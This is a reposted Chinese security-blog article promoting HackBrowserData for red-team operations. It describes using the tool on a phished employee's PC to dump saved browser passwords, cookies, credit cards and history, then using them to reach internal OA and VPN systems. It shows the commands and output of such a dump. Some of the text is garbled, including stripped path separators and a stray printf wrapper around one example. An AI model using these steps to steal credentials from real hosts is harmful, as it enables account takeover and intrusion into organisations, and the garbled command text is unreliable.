HackBrowerData是一款可全平台运行的浏览器数据导出解密工具,在红队行动中,可以用来获取被控主机的浏览器凭证,进而扩大攻击面。例如通过钓鱼邮件获取道某些员工个人PC权限,可以导出其浏览器中保存的账户号密码,继而获取到其内部OA系统,VPN系统等平台登陆权限,扩大攻击面。
1
HackBrowerData下载
下载地址:https://github.com/moonD4rk/HackBrowserData
2
HackBrowerData支持
hackbrowerdata支持以下浏览器数据的获取
3
用法示例
输入 -h 能查看命令及解释
PS C:test> .hack-browser-data.exe -hNAME:hack-browser-data - Export passwords/cookies/history/bookmarks from browserUSAGE:[hack-browser-data -b chrome -f json -dir results -cc]Export all browingdata(password/cookie/history/bookmark) from browserGithub Link: https://github.com/moonD4rk/HackBrowserDataGLOBAL OPTIONS:--verbose, --vv verbose (default: false)--compress, --zip compress result to zip (default: false)--browser value, -b value available browsers: all|chrome|operagx|vivaldi|coccoc|brave|edge|chromium|chrome-beta|opera|yandex|firefox (default:"all")--results-dir value, --dir value export dir (default: "results")--format value, -f value file name csv|json (default: "csv")--profile-path value, -p value custom profile dir path, get withchrome://version--help, -h show help (default: false)--version, -v print the version (default: false)PS C:test> .hack-browser-data.exe -b all -f json --dir results -zip[NOTICE] [browser.go:46,pickChromium] find browser Chrome success[NOTICE] [browser.go:46,pickChromium] find browser Microsoft Edge success[NOTICE] [browsingdata.go:59,Output] output to fileresults/microsoft_edge_download.json success[NOTICE] [browsingdata.go:59,Output] output to fileresults/microsoft_edge_password.json success[NOTICE] [browsingdata.go:59,Output] output to fileresults/microsoft_edge_creditcard.json success[NOTICE] [browsingdata.go:59,Output] output to fileresults/microsoft_edge_bookmark.json success[NOTICE] [browsingdata.go:59,Output] output to fileresults/microsoft_edge_cookie.json success[NOTICE] [browsingdata.go:59,Output] output to fileresults/microsoft_edge_history.json success[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_history.jsonsuccess[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_download.jsonsuccess[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_password.jsonsuccess[NOTICE] [browsingdata.go:59,Output] output to fileresults/chrome_creditcard.json success[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_bookmark.jsonsuccess[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_cookie.jsonsuccess
获取目标主机chrome浏览器中保存的数据,导出为csv表格
printf(PS C:UsersUserDesktop> .hack-browser-data.exe -b chrome -p'C:UsersUserAppDataLocalMicrosoftEdgeUser DataDefault'[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_creditcard.csvsuccess[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_bookmark.csvsuccess[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_cookie.csvsuccess[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_history.csvsuccess[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_download.csvsuccess[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_password.csvsuccess"hello world!");
长风实验室发布、转载的文章中所涉及的技术、思路和工具,仅供以网络安全为目的的学习交流使用,不得用作它途。部分文章来源于网络,如有侵权请联系删除。
END
推荐
阅读
点赞在看
扫码关注|更多好玩
长风实验室 ·
原文始发于微信公众号(长风实验室):强大的红队必备工具,一键抓取用户密码
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论